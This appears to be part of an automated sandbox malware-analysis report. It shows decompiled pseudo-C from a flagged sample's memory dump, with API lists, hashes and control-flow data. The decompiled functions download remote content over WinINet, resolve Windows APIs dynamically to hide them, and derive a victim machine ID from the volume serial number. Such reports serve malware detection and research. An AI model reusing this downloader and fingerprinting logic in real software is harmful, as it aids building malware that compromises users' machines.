                                                                    				 *((intOrPtr*)(_t471 - 0x20)) =  *((intOrPtr*)(_t471 + 0x3df0));
                                                                    				 *(_t471 - 0x10) = 0;
                                                                    				 *(_t471 - 4) = 0;
                                                                    				_t287 = 0xf;
                                                                    				 *((intOrPtr*)(_t471 + 0x228)) = _t287;
                                                                    				 *((intOrPtr*)(_t471 + 0x224)) = 0;
                                                                    				 *(_t471 + 0x214) = 0;
                                                                    				 *((intOrPtr*)(_t471 + 0x20c)) = _t287;
                                                                    				 *(_t471 + 0x208) = 0;
                                                                    				 *(_t471 + 0x1f8) = 0;
                                                                    				 *((intOrPtr*)(_t471 + 0x244)) = _t287;
                                                                    				 *(_t471 + 0x240) = 0;
                                                                    				 *((char*)(_t471 + 0x230)) = 0;
                                                                    				 *((intOrPtr*)(_t471 + 0x1d4)) = _t287;
                                                                    				 *((intOrPtr*)(_t471 + 0x1d0)) = 0;
                                                                    				 *((char*)(_t471 + 0x1c0)) = 0;
                                                                    				 *((intOrPtr*)(_t471 + 0x1f0)) = _t287;
                                                                    				 *((intOrPtr*)(_t471 + 0x1ec)) = 0;
                                                                    				 *((char*)(_t471 + 0x1dc)) = 0;
                                                                    				 *((intOrPtr*)(_t471 + 0x1b8)) = _t287;
                                                                    				 *((intOrPtr*)(_t471 + 0x1b4)) = 0;
                                                                    				 *((char*)(_t471 + 0x1a4)) = 0;
                                                                    				 *(_t471 - 4) = 6;
                                                                    				 *(_t471 - 0x14) = 0;
                                                                    				_t290 = E0040A07D(_t471 + 0x3df4, __ecx, _t471 + 0x1c);
                                                                    				 *(_t471 - 4) = 7;
                                                                    				E004042ED(_t471 + 0x230, _t290);
                                                                    				 *(_t471 - 4) = 6;
                                                                    				E00404354(_t471 + 0x1c, 1, 0);
                                                                    				_t445 = 8;
                                                                    				_t427 = _t471 + 0x230;
                                                                    				if(E0040C0F9(_t445, _t471 + 0x230, "https://", _t445) == 0) {
                                                                    					L2:
                                                                    					 *(_t471 - 0x14) = _t445;
                                                                    					L3:
                                                                    					_t401 = _t471 + 0x230;
                                                                    					 *((char*)(_t471 - 0x18)) = 0x2f;
                                                                    					_t297 = E0040C06B( *(_t471 - 0x14) + 1, _t471 + 0x230, _t471 + 0x230, _t471 - 0x18, 1);
                                                                    					 *(_t471 - 0x1c) = _t297;
                                                                    					_t479 = _t297 - 0xffffffff;
                                                                    					if(_t297 != 0xffffffff) {
                                                                    						_t299 = E0040C034(_t401, _t471 + 0xfc, _t471 + 0x230, _t297, 0xffffffff);
                                                                    						 *(_t471 - 4) = 9;
                                                                    						 *(_t471 - 0x10) = 2;
                                                                    					} else {
                                                                    						 *((intOrPtr*)(_t471 + 0x180)) = 0xf;
                                                                    						 *((intOrPtr*)(_t471 + 0x17c)) = 0;
                                                                    						 *((char*)(_t471 + 0x16c)) = 0;
                                                                    						E00404396(_t471 + 0x16c, _t479, 0x43c8d8, 0);
                                                                    						 *(_t471 - 4) = 8;
                                                                    						_t299 = _t471 + 0x16c;
                                                                    						 *(_t471 - 0x10) = 1;
                                                                    					}
                                                                    					_t447 = _t299;
                                                                    					_t432 = _t471 + 0x214;
                                                                    					E004042ED(_t471 + 0x214, _t299);
                                                                    					if(( *(_t471 - 0x10) & 0x00000002) != 0) {
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffffd;
                                                                    						E00404354(_t471 + 0xfc, 1, 0);
                                                                    					}
                                                                    					 *(_t471 - 4) = 6;
                                                                    					if(( *(_t471 - 0x10) & 0x00000001) != 0) {
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffffe;
                                                                    						E00404354(_t471 + 0x16c, 1, 0);
                                                                    					}
                                                                    					_t402 =  *(_t471 - 0x1c);
                                                                    					_t301 =  *((intOrPtr*)(_t471 + 0x230));
                                                                    					if(_t402 == 0xffffffff) {
                                                                    						__eflags =  *((intOrPtr*)(_t471 + 0x244)) - 0x10;
                                                                    						if(__eflags < 0) {
                                                                    							_t301 = _t471 + 0x230;
                                                                    						}
                                                                    						_t402 =  *(_t471 + 0x240);
                                                                    					} else {
                                                                    						if( *((intOrPtr*)(_t471 + 0x244)) < 0x10) {
                                                                    							_t301 = _t471 + 0x230;
                                                                    						}
                                                                    					}
                                                                    					_t403 = _t402 + _t301;
                                                                    					_t486 =  *((intOrPtr*)(_t471 + 0x244)) - 0x10;
                                                                    					_t302 =  *((intOrPtr*)(_t471 + 0x230));
                                                                    					if( *((intOrPtr*)(_t471 + 0x244)) < 0x10) {
                                                                    						_t302 = _t471 + 0x230;
                                                                    					}
                                                                    					_push( *(_t471 - 0x24));
                                                                    					_push(_t403);
                                                                    					_push(_t302 +  *(_t471 - 0x14));
                                                                    					_push(_t471 + 0x188);
                                                                    					 *((intOrPtr*)(_t471 + 0x19c)) = 0xf;
                                                                    					 *((intOrPtr*)(_t471 + 0x198)) = 0;
                                                                    					 *((char*)(_t471 + 0x188)) = 0;
                                                                    					E0040C37A(0, _t427, _t432, _t447, _t486);
                                                                    					_t448 = _t471 + 0x188;
                                                                    					 *(_t471 - 4) = 0xa;
                                                                    					E004042ED(_t471 + 0x1f8, _t448);
                                                                    					_t404 = _t448;
                                                                    					 *(_t471 - 4) = 6;
                                                                    					E00404354(_t448, 1, 0);
                                                                    					if(E0040C00F(_t471 + 0x214, "#", 0) == 0xffffffff) {
                                                                    						_t311 = E00404778(_t471 + 0x54, _t471 + 0x214);
                                                                    						 *(_t471 - 4) = 0xc;
                                                                    						_t96 = _t471 - 0x10;
                                                                    						 *_t96 =  *(_t471 - 0x10) | 0x00000008;
                                                                    						__eflags =  *_t96;
                                                                    					} else {
                                                                    						_t311 = E0040C034(_t404, _t471 + 0xe0, _t471 + 0x214, 0, _t309);
                                                                    						 *(_t471 - 4) = 0xb;
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) | 0x00000004;
                                                                    					}
                                                                    					E004042ED(_t471 + 0x214, _t311);
                                                                    					if(( *(_t471 - 0x10) & 0x00000008) != 0) {
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffff7;
                                                                    						_t404 = _t471 + 0x54;
                                                                    						E00404354(_t471 + 0x54, 1, 0);
                                                                    					}
                                                                    					 *(_t471 - 4) = 6;
                                                                    					if(( *(_t471 - 0x10) & 0x00000004) != 0) {
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffffb;
                                                                    						_t404 = _t471 + 0xe0;
                                                                    						E00404354(_t471 + 0xe0, 1, 0);
                                                                    					}
                                                                    					_t314 = E0040C00F(_t471 + 0x1f8, ":", 0);
                                                                    					 *(_t471 - 0x1c) = _t314;
                                                                    					if(_t314 == 0xffffffff) {
                                                                    						_t404 = _t471 + 0x150;
                                                                    						 *((intOrPtr*)(_t471 + 0x164)) = 0xf;
                                                                    						 *((intOrPtr*)(_t471 + 0x160)) = 0;
                                                                    						 *((char*)(_t471 + 0x150)) = 0;
                                                                    						E00404396(_t471 + 0x150, __eflags, 0x43c8d8, 0);
                                                                    						 *(_t471 - 4) = 0xe;
                                                                    						_t124 = _t471 - 0x10;
                                                                    						 *_t124 =  *(_t471 - 0x10) | 0x00000020;
                                                                    						__eflags =  *_t124;
                                                                    						_t316 = _t471 + 0x150;
                                                                    					} else {
                                                                    						_t316 = E0040C034(_t404, _t471 + 0xc4, _t471 + 0x1f8, _t314 + 1, 0xffffffff);
                                                                    						 *(_t471 - 4) = 0xd;
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) | 0x00000010;
                                                                    					}
                                                                    					E004042ED(_t471 + 0x1dc, _t316);
                                                                    					if(( *(_t471 - 0x10) & 0x00000020) != 0) {
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xffffffdf;
                                                                    						_t404 = _t471 + 0x150;
                                                                    						E00404354(_t471 + 0x150, 1, 0);
                                                                    					}
                                                                    					 *(_t471 - 4) = 6;
                                                                    					if(( *(_t471 - 0x10) & 0x00000010) != 0) {
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xffffffef;
                                                                    						_t404 = _t471 + 0xc4;
                                                                    						E00404354(_t471 + 0xc4, 1, 0);
                                                                    					}
                                                                    					_t318 =  *(_t471 - 0x1c);
                                                                    					if( *(_t471 - 0x1c) == 0xffffffff) {
                                                                    						_t318 =  *(_t471 + 0x208);
                                                                    					}
                                                                    					_t320 = E0040C034(_t404, _t471 + 0x38, _t471 + 0x1f8, 0, _t318);
                                                                    					 *(_t471 - 4) = 0xf;
                                                                    					E004042ED(_t471 + 0x1f8, _t320);
                                                                    					_t405 = _t471 + 0x38;
                                                                    					 *(_t471 - 4) = 6;
                                                                    					E00404354(_t471 + 0x38, 1, 0);
                                                                    					_t323 =  *(_t471 - 0x14);
                                                                    					if( *(_t471 - 0x14) <= 0) {
                                                                    						_t405 = _t471 + 0x118;
                                                                    						 *((intOrPtr*)(_t471 + 0x12c)) = 0xf;
                                                                    						 *((intOrPtr*)(_t471 + 0x128)) = 0;
                                                                    						 *(_t471 + 0x118) = 0;
                                                                    						E00404396(_t471 + 0x118, __eflags, 0x43c8d8, 0);
                                                                    						 *(_t471 - 4) = 0x11;
                                                                    						_t159 = _t471 - 0x10;
                                                                    						 *_t159 =  *(_t471 - 0x10) | 0x00000080;
                                                                    						__eflags =  *_t159;
                                                                    						_t325 = _t471 + 0x118;
                                                                    					} else {
                                                                    						_t325 = E0040C034(_t405, _t471, _t471 + 0x230, 0, _t323 + 0xfffffffd);
                                                                    						 *(_t471 - 4) = 0x10;
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) | 0x00000040;
                                                                    					}
                                                                    					E004042ED(_t471 + 0x1c0, _t325);
                                                                    					if(( *(_t471 - 0x10) & 0x00000080) != 0) {
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xffffff7f;
                                                                    						_t405 = _t471 + 0x118;
                                                                    						E00404354(_t471 + 0x118, 1, 0);
                                                                    					}
                                                                    					 *(_t471 - 4) = 6;
                                                                    					if(( *(_t471 - 0x10) & 0x00000040) != 0) {
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xffffffbf;
                                                                    						_t405 = _t471;
                                                                    						E00404354(_t471, 1, 0);
                                                                    					}
                                                                    					_t328 = E0040C00F(_t471 + 0x214, "?", 0);
                                                                    					 *(_t471 - 0x14) = _t328;
                                                                    					if(_t328 == 0xffffffff) {
                                                                    						_t405 = _t471 + 0x134;
                                                                    						 *((intOrPtr*)(_t471 + 0x148)) = 0xf;
                                                                    						 *((intOrPtr*)(_t471 + 0x144)) = 0;
                                                                    						 *(_t471 + 0x134) = 0;
                                                                    						E00404396(_t471 + 0x134, __eflags, 0x43c8d8, 0);
                                                                    						 *(_t471 - 4) = 0x13;
                                                                    						_t187 = _t471 - 0x10;
                                                                    						 *_t187 =  *(_t471 - 0x10) | 0x00000200;
                                                                    						__eflags =  *_t187;
                                                                    						_t330 = _t471 + 0x134;
                                                                    					} else {
                                                                    						_t330 = E0040C034(_t405, _t471 + 0x8c, _t471 + 0x214, _t328 + 1, 0xffffffff);
                                                                    						 *(_t471 - 4) = 0x12;
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) | 0x00000100;
                                                                    					}
                                                                    					E004042ED(_t471 + 0x1a4, _t330);
                                                                    					if(( *(_t471 - 0x10) & 0x00000200) != 0) {
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffdff;
                                                                    						_t405 = _t471 + 0x134;
                                                                    						E00404354(_t471 + 0x134, 1, 0);
                                                                    					}
                                                                    					 *(_t471 - 4) = 6;
                                                                    					if(( *(_t471 - 0x10) & 0x00000100) != 0) {
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffeff;
                                                                    						_t405 = _t471 + 0x8c;
                                                                    						E00404354(_t471 + 0x8c, 1, 0);
                                                                    					}
                                                                    					_t332 = _t471 + 0x214;
                                                                    					if( *(_t471 - 0x14) == 0xffffffff) {
                                                                    						_t333 = E00404778(_t471 + 0xa8, _t332);
                                                                    						 *(_t471 - 4) = 0x15;
                                                                    						_t213 = _t471 - 0x10;
                                                                    						 *_t213 =  *(_t471 - 0x10) | 0x00000800;
                                                                    						__eflags =  *_t213;
                                                                    					} else {
                                                                    						_t333 = E0040C034(_t405, _t471 + 0x70, _t332, 0,  *(_t471 - 0x14));
                                                                    						 *(_t471 - 4) = 0x14;
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) | 0x00000400;
                                                                    					}
                                                                    					E004042ED(_t471 + 0x214, _t333);
                                                                    					if(( *(_t471 - 0x10) & 0x00000800) != 0) {
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffff7ff;
                                                                    						E00404354(_t471 + 0xa8, 1, 0);
                                                                    					}
                                                                    					 *(_t471 - 4) = 6;
                                                                    					if(( *(_t471 - 0x10) & 0x00000400) != 0) {
                                                                    						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffbff;
                                                                    						E00404354(_t471 + 0x70, 1, 0);
                                                                    					}
                                                                    					_t406 = 0x3a98;
                                                                    					_t335 = _t471 + 0x24c;
                                                                    					do {
                                                                    						 *_t335 = 0;
                                                                    						_t335 = _t335 + 1;
                                                                    						_t406 = _t406 - 1;
                                                                    					} while (_t406 != 0);
                                                                    					_t336 =  *(_t471 + 0x1f8);
                                                                    					_t458 = 0x10;
                                                                    					if( *((intOrPtr*)(_t471 + 0x20c)) < _t458) {
                                                                    						_t336 = _t471 + 0x1f8;
                                                                    					}
                                                                    					DeleteUrlCacheEntry(_t336); // executed
                                                                    					_t338 =  *(_t471 + 0x3df4);
                                                                    					if( *((intOrPtr*)(_t471 + 0x3e08)) < _t458) {
                                                                    						_t338 = _t471 + 0x3df4;
                                                                    					}
                                                                    					DeleteUrlCacheEntry(_t338);
                                                                    					_t340 = InternetOpenA(0x43c8d8, 0, 0, 0, 0); // executed
                                                                    					 *(_t471 - 0x14) = _t340;
                                                                    					_t341 =  *((intOrPtr*)(_t471 + 0x1dc));
                                                                    					if( *((intOrPtr*)(_t471 + 0x1f0)) < _t458) {
                                                                    						_t341 = _t471 + 0x1dc;
                                                                    					}
                                                                    					_push(_t341);
                                                                    					 *(_t471 - 0x1c) = E0041EA23();
                                                                    					_t343 =  *((intOrPtr*)(_t471 + 0x1c0));
                                                                    					if( *((intOrPtr*)(_t471 + 0x1d4)) < _t458) {
                                                                    						_t343 = _t471 + 0x1c0;
                                                                    					}
                                                                    					_t344 =  *0x446458(_t343, "https");
                                                                    					asm("sbb esi, esi");
                                                                    					_t462 = ( ~_t344 & 0xff800000) + 0x4800000;
                                                                    					if( *(_t471 - 0x14) == 0) {
                                                                    						L80:
                                                                    						_push(_t471 + 0x24c);
                                                                    						goto L81;
                                                                    					} else {
                                                                    						_t356 =  *(_t471 + 0x1f8);
                                                                    						if( *((intOrPtr*)(_t471 + 0x20c)) < 0x10) {
                                                                    							_t356 = _t471 + 0x1f8;
                                                                    						}
                                                                    						_t357 = InternetConnectA( *(_t471 - 0x14), _t356,  *(_t471 - 0x1c), 0, 0, 3, _t462, 0); // executed
                                                                    						 *(_t471 - 0x10) = _t357;
                                                                    						if(_t357 == 0) {
                                                                    							L79:
                                                                    							InternetCloseHandle( *(_t471 - 0x14));
                                                                    							goto L80;
                                                                    						} else {
                                                                    							_t420 =  *(_t471 + 0x214);
                                                                    							if( *((intOrPtr*)(_t471 + 0x228)) < 0x10) {
                                                                    								_t420 = _t471 + 0x214;
                                                                    							}
                                                                    							_t359 = HttpOpenRequestA(_t357, "GET", _t420, 0, 0, 0, _t462, 0); // executed
                                                                    							_t465 = _t359;
                                                                    							if(_t465 == 0) {
                                                                    								L78:
                                                                    								InternetCloseHandle( *(_t471 - 0x10));
                                                                    								goto L79;
                                                                    							} else {
                                                                    								_t361 = HttpSendRequestA(_t465, 0, 0, 0, 0); // executed
                                                                    								 *(_t471 - 0x1c) = _t361;
                                                                    								 *(_t471 - 0x28) = 0x100;
                                                                    								if(HttpQueryInfoA(_t465, 0x13, _t471 + 0x3ce4, _t471 - 0x28, 0) != 0) {
                                                                    									_push(_t471 + 0x3ce4);
                                                                    									_t366 = E0041EA23();
                                                                    									__eflags = _t366 - 0xc8;
                                                                    									if(_t366 != 0xc8) {
                                                                    										goto L73;
                                                                    									}
                                                                    									__eflags =  *(_t471 - 0x1c);
                                                                    									if( *(_t471 - 0x1c) != 0) {
                                                                    										InternetReadFile(_t465, _t471 + 0x24c, 0x3a97, _t471 - 0x24); // executed
                                                                    										 *((char*)(_t471 +  *(_t471 - 0x24) + 0x24c)) = 0;
                                                                    									}
                                                                    									InternetCloseHandle(_t465); // executed
                                                                    									goto L78;
                                                                    								}
                                                                    								L73:
                                                                    								_push("ERROR");
                                                                    								L81:
                                                                    								_t463 =  *((intOrPtr*)(_t471 - 0x20));
                                                                    								 *((intOrPtr*)(_t463 + 0x14)) = 0xf;
                                                                    								 *((intOrPtr*)(_t463 + 0x10)) = 0;
                                                                    								 *_t463 = 0;
                                                                    								E00404331(_t463);
                                                                    								E00404354(_t471 + 0x1a4, 1, 0);
                                                                    								E00404354(_t471 + 0x1dc, 1, 0);
                                                                    								E00404354(_t471 + 0x1c0, 1, 0);
                                                                    								E00404354(_t471 + 0x230, 1, 0);
                                                                    								E00404354(_t471 + 0x1f8, 1, 0);
                                                                    								E00404354(_t471 + 0x214, 1, 0);
                                                                    								E00404354(_t471 + 0x3df4, 1, 0);
                                                                    								 *[fs:0x0] =  *((intOrPtr*)(_t471 - 0xc));
                                                                    								_pop(_t442);
                                                                    								_pop(_t464);
                                                                    								_pop(_t396);
                                                                    								return E0041DA9B(_t463, _t396,  *(_t471 + 0x3de4) ^ _t471, _t427, _t442, _t464);
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				_t445 = 7;
                                                                    				_t427 = _t471 + 0x230;
                                                                    				if(E0040C0F9(_t445, _t471 + 0x230, "http://", _t445) != 0) {
                                                                    					goto L3;
                                                                    				}
                                                                    				goto L2;
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 004042ED: _memmove.LIBCMT ref: 00404309
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                      • Part of subcall function 00404396: _memmove.LIBCMT ref: 004043E7
                                                                    • DeleteUrlCacheEntry.WININET(?), ref: 0040A7EC
                                                                    • DeleteUrlCacheEntry.WININET(?), ref: 0040A807
                                                                    • InternetOpenA.WININET(0043C8D8,00000000,00000000,00000000,00000000), ref: 0040A816
                                                                    • StrCmpCA.SHLWAPI(?,https), ref: 0040A857
                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,-04800000,00000000), ref: 0040A89A
                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,-04800000,00000000), ref: 0040A8CC
                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040A8DD
                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040A8FC
                                                                    • InternetReadFile.WININET(00000000,?,00003A97,?), ref: 0040A937
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040A948
                                                                    • InternetCloseHandle.WININET(?), ref: 0040A951
                                                                    • InternetCloseHandle.WININET(?), ref: 0040A95A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleHttp_memmove$CacheDeleteEntryOpenRequest$ConnectFileInfoQueryReadSend
                                                                    • String ID: ERROR$GET$http://$https$https://
                                                                    • API String ID: 2523455513-650462858
                                                                    • Opcode ID: 145ba49181d24a9f971275a7b9d72ff4315adad309d865146dc575154e394ff7
                                                                    • Instruction ID: 8b6035fab06e129754a09b681593b440589fcea7e7ab5634ae7be08f0c245f5f
                                                                    • Opcode Fuzzy Hash: 145ba49181d24a9f971275a7b9d72ff4315adad309d865146dc575154e394ff7
                                                                    • Instruction Fuzzy Hash: 3A328EB180028DDEDB30DF55CD89BEE77A8BF15318F10062AE919AB1D1D7781B48CB65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 410 41899f-4189b2 LoadLibraryA 411 4189b8-418ad9 GetProcAddress * 12 410->411 412 418ada-418aed LoadLibraryA 410->412 411->412 413 418b01 412->413 414 418aef-418afc GetProcAddress 412->414 414->413
                                                                    C-Code - Quality: 92%
                                                                    			E0041899F() {
                                                                    				struct HINSTANCE__* _t1;
                                                                    				struct HINSTANCE__* _t2;
                                                                    				_Unknown_base(*)()* _t3;
                                                                    				_Unknown_base(*)()* _t5;
                                                                    				void* _t17;
                                                                    
                                                                    				_t1 = LoadLibraryA( *0x445b48);
                                                                    				 *0x446474 = _t1;
                                                                    				if(_t1 != 0) {
                                                                    					 *0x44641c = GetProcAddress(_t1,  *0x445c14);
                                                                    					_t5 = GetProcAddress( *0x446474,  *0x445e74);
                                                                    					 *0x44637c = _t5;
                                                                    					 *0x446428 =  *_t5( *0x446474,  *0x44613c, _t17);
                                                                    					 *0x446298 = GetProcAddress( *0x446474,  *0x445d2c);
                                                                    					 *0x4463c4 = GetProcAddress( *0x446474,  *0x445ac8);
                                                                    					 *0x44638c = GetProcAddress( *0x446474,  *0x4461c8);
                                                                    					 *0x4464a4 = GetProcAddress( *0x446474,  *0x445c34);
                                                                    					 *0x44645c = GetProcAddress( *0x446474,  *0x445d64);
                                                                    					 *0x4463d4 = GetProcAddress( *0x446474,  *0x445e2c);
                                                                    					 *0x4462fc = GetProcAddress( *0x446474,  *0x4460f8);
                                                                    					 *0x4463fc = GetProcAddress( *0x446474,  *0x445fac);
                                                                    					 *0x4463d0 = GetProcAddress( *0x446474,  *0x445b30);
                                                                    					 *0x446400 = GetProcAddress( *0x446474,  *0x4461a0);
                                                                    				}
                                                                    				_t2 = LoadLibraryA( *0x446078); // executed
                                                                    				 *0x446260 = _t2;
                                                                    				if(_t2 != 0) {
                                                                    					_t3 = GetProcAddress(_t2,  *0x445fb0);
                                                                    					 *0x446354 = _t3;
                                                                    					return _t3;
                                                                    				}
                                                                    				return _t2;
                                                                    			}









                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 2238633743-0
                                                                    • Opcode ID: 6fa6767ac5a0adf8d25a67291e1676a3f66c8230617337273f847c892ed360e1
                                                                    • Instruction ID: dc9ff5b1b1a2dcea5952fe958f5213409efa8aa48f08c05d81d78615b1a2f929
                                                                    • Opcode Fuzzy Hash: 6fa6767ac5a0adf8d25a67291e1676a3f66c8230617337273f847c892ed360e1
                                                                    • Instruction Fuzzy Hash: 4531F5BD401A51AFEF125F71ED498257EB6FB0B652702813AE95182232DB324864EF0E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 96%
                                                                    			E00414C66(void* __ebx, CHAR* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                    				signed int _t72;
                                                                    				signed int _t74;
                                                                    				long _t76;
                                                                    				signed char* _t84;
                                                                    				signed char* _t85;
                                                                    				void* _t86;
                                                                    				void* _t88;
                                                                    				void* _t89;
                                                                    				void* _t92;
                                                                    				void* _t127;
                                                                    				CHAR* _t130;
                                                                    				signed char* _t131;
                                                                    				signed char* _t137;
                                                                    				void* _t145;
                                                                    
                                                                    				_push(0x1e0);
                                                                    				E0042083E(E0043412D, __ebx, __edi, __esi);
                                                                    				_t110 = 0;
                                                                    				 *(_t145 - 0x1e8) = 0;
                                                                    				_t136 = __ecx;
                                                                    				 *(_t145 - 0x1ec) = __ecx;
                                                                    				 *(_t145 - 0x1e4) = 0;
                                                                    				 *(_t145 - 0x120) = 0xf;
                                                                    				 *((intOrPtr*)(_t145 - 0x124)) = 0;
                                                                    				 *(_t145 - 0x134) = 0;
                                                                    				 *((intOrPtr*)(_t145 - 4)) = 0;
                                                                    				if(GetWindowsDirectoryA(_t145 - 0x118, 0x104) == 0) {
                                                                    					 *(_t145 - 0x118) = 0x43;
                                                                    				}
                                                                    				 *(_t145 - 0x1e0) =  *(_t145 - 0x118);
                                                                    				 *((short*)(_t145 - 0x1df)) = 0x5c3a;
                                                                    				 *(_t145 - 0x1dd) = _t110;
                                                                    				GetVolumeInformationA(_t145 - 0x1e0, _t110, _t110, _t145 - 0x1e4, _t110, _t110, _t110, _t110); // executed
                                                                    				_t72 =  *(_t145 - 0x1e4) * 0x14a30b - 0x69427551;
                                                                    				 *(_t145 - 0x144) = _t72;
                                                                    				_t74 = _t72 * 0x14a30b - 0x69427551;
                                                                    				 *(_t145 - 0x140) = _t74;
                                                                    				_t76 = _t74 * 0x14a30b - 0x69427551;
                                                                    				_t127 = 0;
                                                                    				do {
                                                                    					_t76 = _t76 * 0x14a30b - 0x69427551;
                                                                    					 *(_t145 + _t127 - 0x13c) = _t76;
                                                                    					_t127 = _t127 + 1;
                                                                    				} while (_t127 < 8);
                                                                    				 *(_t145 - 0x1e4) = _t76;
                                                                    				_t130 = HeapAlloc(GetProcessHeap(), _t110, 0x104);
                                                                    				if(_t130 != _t110) {
                                                                    					wsprintfA(_t130, "%08lX%04lX%lu-",  *(_t145 - 0x144),  *(_t145 - 0x140) & 0x0000ffff,  *((intOrPtr*)(_t145 - 0x13a)));
                                                                    					E0040C297(_t145 - 0x134, _t130);
                                                                    					_t137 =  *(_t145 - 0x134);
                                                                    					_t131 = _t137;
                                                                    					if( *(_t145 - 0x120) >= 0x10) {
                                                                    						_t84 = _t137;
                                                                    					} else {
                                                                    						_t131 = _t145 - 0x134;
                                                                    						_t84 = _t131;
                                                                    					}
                                                                    					_t85 =  &(_t84[ *((intOrPtr*)(_t145 - 0x124))]);
                                                                    					 *(_t145 - 0x1e8) = _t85;
                                                                    					if( *(_t145 - 0x120) < 0x10) {
                                                                    						_t137 = _t145 - 0x134;
                                                                    					}
                                                                    					if(_t137 != _t85) {
                                                                    						_t131 = _t131 - _t137;
                                                                    						do {
                                                                    							_t131[_t137] = E0041FCBB( *_t137 & 0x000000ff);
                                                                    							_t137 =  &(_t137[1]);
                                                                    							_pop(0x69427551);
                                                                    						} while (_t137 !=  *(_t145 - 0x1e8));
                                                                    					}
                                                                    					_t86 = E00415326(_t131, _t145 - 0x1c0); // executed
                                                                    					 *((char*)(_t145 - 4)) = 1;
                                                                    					_t132 = E0040C034(0x69427551, _t145 - 0x1dc, _t86, 0x14, 0x11);
                                                                    					 *((char*)(_t145 - 4)) = 2;
                                                                    					_t88 = E0041537D(_t87, _t145 - 0x1a4);
                                                                    					 *((char*)(_t145 - 4)) = 3;
                                                                    					_t89 = E0040C034(0x69427551, _t145 - 0x188, _t88, _t110, 0x18);
                                                                    					_t111 = _t145 - 0x134;
                                                                    					 *((char*)(_t145 - 4)) = 4;
                                                                    					E00415BAD(_t89, _t145 - 0x134, _t89, _t132, _t145 - 0x16c);
                                                                    					 *((char*)(_t145 - 4)) = 5;
                                                                    					_t92 = E004046CE(_t132, _t145 - 0x150);
                                                                    					 *((char*)(_t145 - 4)) = 6;
                                                                    					E004042ED(_t111, _t92);
                                                                    					_t110 = 0;
                                                                    					E00404354(_t145 - 0x150, 1, 0);
                                                                    					E00404354(_t145 - 0x16c, 1, 0);
                                                                    					E00404354(_t145 - 0x188, 1, 0);
                                                                    					E00404354(_t145 - 0x1a4, 1, 0);
                                                                    					E00404354(_t145 - 0x1dc, 1, 0);
                                                                    					 *((char*)(_t145 - 4)) = 0;
                                                                    					E00404354(_t145 - 0x1c0, 1, 0);
                                                                    					_t130 =  *(_t145 - 0x1ec);
                                                                    					_t130[0x14] = 0xf;
                                                                    					_t130[0x10] = 0;
                                                                    					_t136 = _t145 - 0x134;
                                                                    					 *_t130 = 0;
                                                                    					E004042ED(_t130, _t145 - 0x134);
                                                                    					E00404354(_t136, 1, 0);
                                                                    				} else {
                                                                    					_t136[5] = 0xf;
                                                                    					_t136[4] = _t110;
                                                                    					 *_t136 = _t110;
                                                                    					E00404331(_t136, _t110);
                                                                    					E00404354(_t145 - 0x134, 1, _t110);
                                                                    				}
                                                                    				return E00420888(_t110, _t130, _t136);
                                                                    			}


















                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00414C70
                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00414CB1
                                                                    • GetVolumeInformationA.KERNELBASE ref: 00414CF1
                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414D46
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00414D4D
                                                                    • wsprintfA.USER32 ref: 00414D9C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocDirectoryH_prolog3_InformationProcessVolumeWindowswsprintf
